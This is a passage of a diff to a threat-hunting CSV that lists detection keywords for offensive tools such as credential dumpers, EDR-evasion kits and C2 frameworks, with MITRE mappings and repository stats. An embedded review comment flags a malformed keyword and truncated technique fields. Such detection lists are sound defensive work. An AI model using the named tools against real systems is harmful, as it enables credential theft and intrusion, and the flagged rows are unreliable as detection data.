Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","10","10","96","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z" "*foreign_lsass.x86*","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - 
T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","10","10","96","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z" -"*forge_ticket.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*forge_ticket_spec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*ForgeCert.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*forge_ticket.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*forge_ticket_spec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ForgeCert.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*ForgeCert-main*","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","1","N/A","10","6","538","87","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z" "*forkatz.exe*","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","10","2","122","15","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" "*forkatz.sln*","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","10","2","122","15","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" 
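Review bot: The keyword `"*-force-forwardableet-ADComputer*"` on the impacket getST.py row looks like two strings fused together (`-force-forwardable` followed by what appears to be the tail of `Get-ADComputer`), and this change carries it over unchanged while only refreshing the star and fork counts. As written the pattern is unlikely to match any real command line, so the detection this row stands for would silently never fire. If that reading is right, the keyword should be reduced to something like `"*-force-forwardable*"`, with the cmdlet fragment restored to whichever row it was lost from. The metasploit rows in the same hunk also carry `T1204 -T1210` in the techniques field, where the missing space can break consumers that split on ` - `, and the sharpcollection row's technique list ends in a truncated `T12`.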
@@ -10402,28 +10553,28 @@ "*--format-string ziiiiizzzb * ","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "*--format-string ziiiiizzzib *","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - 
T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "*fortalice/bofhound*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" -"*fortra/impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*fortra/impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*FortyNorthSecurity*","offensive_tool_keyword","Github Username","FortyNorth Security is a computer security consultancy specializing in offensive security work. We regularly perform red team assessments. pen tests. 
and more","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/FortyNorthSecurity","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*FortyNorthSecurity/CIMplant*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "*FortyNorthSecurity/FunctionalC2*","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","1","N/A","10","10","58","15","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z" "*found-passwords.txt*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*FourEye(shellcode_bypass*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*FourEye-main*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" -"*fox-it/adconnectdump*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active 
Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","506","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" -"*fox-it/BloodHound*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*fox-it/adconnectdump*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","507","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" +"*fox-it/BloodHound*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" "*foxlox/hypobrychium*","offensive_tool_keyword","hypobrychium","hypobrychium AV/EDR Bypass","T1562.001 - T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/foxlox/hypobrychium","1","1","N/A","8","1","72","21","2023-07-21T21:13:20Z","2023-07-18T09:55:07Z" -"*fpc -c Seatbelt*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*FrameManagementAssociationRequest.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*FrameManagementDeauthentication.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*FrameManagementProbeRequest.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*FrameManagementReassociationResponse.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*framework/obfuscation/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*framework-114634acb84f8baa.js*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*Framework-MobSF*","offensive_tool_keyword","Mobile-Security-Framework-MobSF","Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. malware analysis and security assessment framework capable of performing static and dynamic analysis. MobSF support mobile app binaries (APK. XAPK. 
IPA & APPX) along with zipped source code and provides REST APIs for seamless integration with your CI/CD or DevSecOps pipeline.The Dynamic Analyzer helps you to perform runtime security assessment and interactive instrumented testing.","T1565.001 - T1565.002 - T1565.003 - T1565.004 - T1523","TA0007 - TA0010 - TA0003","N/A","N/A","Frameworks","https://github.com/MobSF/Mobile-Security-Framework-MobSF","1","1","N/A","N/A","10","14942","3006","2023-10-03T20:48:09Z","2015-01-31T04:36:01Z" +"*fpc -c Seatbelt*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*FrameManagementAssociationRequest.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*FrameManagementDeauthentication.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*FrameManagementProbeRequest.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*FrameManagementReassociationResponse.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*framework/obfuscation/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*framework-114634acb84f8baa.js*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*Framework-MobSF*","offensive_tool_keyword","Mobile-Security-Framework-MobSF","Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. malware analysis and security assessment framework capable of performing static and dynamic analysis. MobSF support mobile app binaries (APK. XAPK. IPA & APPX) along with zipped source code and provides REST APIs for seamless integration with your CI/CD or DevSecOps pipeline.The Dynamic Analyzer helps you to perform runtime security assessment and interactive instrumented testing.","T1565.001 - T1565.002 - T1565.003 - T1565.004 - T1523","TA0007 - TA0010 - TA0003","N/A","N/A","Frameworks","https://github.com/MobSF/Mobile-Security-Framework-MobSF","1","1","N/A","N/A","10","14948","3006","2023-10-03T20:48:09Z","2015-01-31T04:36:01Z" "*frampton.py*","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. 
shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","69","16","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" -"*freenas_reverse_root_shell_csrf*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*Freeze_*_darwin_amd64*","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","N/A","N/A","10","1333","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" -"*Freeze_*_linux_amd64*","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. 
